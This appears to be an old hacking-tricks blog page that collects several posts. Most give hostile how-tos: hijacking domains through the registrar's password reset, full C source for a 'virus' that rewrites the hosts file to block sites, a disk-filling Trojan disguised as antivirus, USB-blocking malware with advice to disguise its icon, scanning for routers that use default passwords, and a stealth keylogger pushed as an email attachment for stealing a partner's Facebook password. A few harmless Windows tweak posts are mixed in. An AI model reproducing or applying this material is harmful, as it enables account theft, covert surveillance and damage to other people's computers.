Sunday, 9 September 2012

Domain Hijacking – How to Hijack a Domain

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain.

These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.

block_usb.c (source code)
unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.

%windir%\system32\drivers\etc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1 google.com

5. Delete all such entries which contain the names of blocked sites.

How to Make a Trojan Horse

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the.dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

How to compile, test and remove the damage?

Compilation:
For step-by-step compilation guide, refer my post How to compile C Programs.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%\system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

Please pass your comments and tell me your opinion.

How to Alter Windows Product ID?

If you are running a Microsoft Windows operating system on your computer, then you are most likely aware of the fact that your PC will have a Product ID. This Product ID is a system specific alphanumeric code which is derived/calculated based on the Windows product key you use and the hardware configuration of your Computer. In simple words, Product ID is the alphanumeric code that you see when you Right-Click on the My Computer icon and select theProperties option.

Ever wondered how to alter the Windows Product ID?

It is possible to alter the Windows Product ID and change it to what ever you like. For example, you can change the Product ID and put your nickname in place of the formal Product ID displayed by the Operating System. This hack is too easy and can be done within minutes. The screenshot showing the altered Product ID is given below

Win 7 PC showing Original PID

Windows 7 PC showing Altered PID

As you can see from the above screenshot it is simple and easy to make your Windows display what ever you want in the place of the real Product ID. Here is a step-by-step procedure to alter your Windows Product ID.

1. Goto Start->Run and type the following in the Run dialog box

regedit

2. After you open the Registry Editor, navigate to the following key

HKey_Local_Machine\Software\Microsoft\Windows NT\Current Version

3. On the right hand side, you can see an entry by name ProductID listed under the headingName.

4. Double-Click on ProductID, a dialog box will pop-up showing your Windows PID. Now you can delete the original PID and enter anything of your choice.

5. Once you are done, just click on OK and close the Registry Editor. Now you can see the altered Product ID in the Windows Properties window.

NOTE: This trick works on Win 7, Vista and Win XP

I hope you like this trick. Pass your comments. Cheers!

How to Hack an Ethernet ADSL Router

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability in it which can easily be exploited by anyone with a basic knowledge of computer.

In this post, I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.

Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in theDefault username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later.

This makes it possible for the attackers to gain unauthorized access to the router and modify it’s settings using a common set of default usernames and passwords. Here is how you can do it. Before you proceed, you need the following tool in the process:

Angry IP Scanner

Here is a detailed information on how to exploit the vulnerability of an ADSL router:

Go to www.whatismyipaddress.com. Once the page is loaded, you will find your IP address. Note it down.
Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.

Suppose your IP is 117.192.195.101, you can set the range something as117.192.194.0 to 117.192.200.255 so that there exists at least 200-300 IP addresses in the range.

Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80(we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.

I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools

Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image:

Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.

Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below:

If you do not succeed to gain access, select another IP from the list and repeat the step-5. At least 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings.If this happens, the victim will have to reconfigure/reset the router settings in order to bring it back to the action.

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.

Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.

Warning!

All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

How to Hack a Facebook Password

Wondering to know how to hack a Facebook password? Well, before you can do that, it is very much necessary to understand the real ways of hacking that actually work and also those that are simply scam and do not work. So, in this post we’ll look at some of the possible ways to hack Facebook password!

Every day I get a lot of emails from people requesting me to hack Facebook passwords of their spouse, girlfriend or boyfriend so as to reveal their secret relationships (if any). Most of them are even willing to pay for the service.

However, I strongly deny any such requests since I do not provide any paid hacking service. But anyhow, I have decided to write down this post so that you can learn the tricks for yourself and implement everything at your own risk.

Possible Ways to Hack a Facebook Password:

With my experience of over 9 years in the field of ethical hacking and IT security, all I can tell you is that there are only two ways to successfully hack a Facebook password.

1. Keylogging – The Easiest Way!

Keylogging refers to simply recording each and every keystroke that is typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will automatically load from the start-up, runs in the invisible mode and start capturing each and every keystroke that was typed on the computer.

Some keyloggers with advanced features can also capture screenshots and monitor every activity of the computer. One doesn’t need to have any special knowledge in order to install and use a keylogger. That means, anyone with a basic knowledge of computer can install and use this software with ease.

Hence, for a novice computer, user this method is the easiest way to hack a Facebook password. I recommend the following keylogger as the best option you can go for:

Why SniperSpy is the Best?

Today, there exists hundreds of keyloggers on the market but where of them are nothing more than a crap. However, there are only a few that stand out of the crowd and SniperSpy is the best among them.

I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this, you can install it on a remote computer without the need for having physical access to it. It operates in a complete stealth mode so that it remains 100% undetected!

Here is a summary of benefits that you will receive with Sniperspy:

Access ANY Password

With SniperSpy, you can hack any password and gain access to Facebook or any other online account.
Monitor Every Activity

You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
Never Get Caught!

SniperSpy operates in a total stealth mode and thus remains undetected. Therefore you need not have the fear of being traced back or getting caught.
Completely Safe to Use

This software is 100% safe to use since it does not collect any personal information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
Works on both Windows and Mac

Fully compatible with Windows 2000/XP/Vista/7 and Mac.

How it Works?

Since the deployment module is very small in size (81 kb), you can easily drop it onto a word document, image or any other file and send it as an email attachment. This makes the process stealth and the target user will have nothing to suspect. Once they open the attachment, SniperSpy will install silently and the monitoring process will begin.

You can login to your secure control panel from any browser and start viewing the logs to get the password!

So, if you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!

How to Hack Windows Administrator Password?

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

You do not need to know the old password to set a new one
Will detect and offer to unlock locked or disabled out user accounts!
There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below
Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)

2. Now type net user and hit Enter

3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows

4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

How to Change the Logon Screen Background in Windows 7

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to

C:\Windows\system32\oobe\info\backgrounds

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key

HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background

If Background does not exist rightclick LogonUI, select New and then Key, and then name itBackground. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

How to Create Your Own Customized Run Commands

The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.

CREATING THE CUSTOMIZED RUN COMMAND

Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.

1. Right click on your Desktop and select New -> Shortcut.

2. You will see a “Create Shortcut” Dialog box as shown below

3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.

4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.

5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.

6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.

In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.

To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.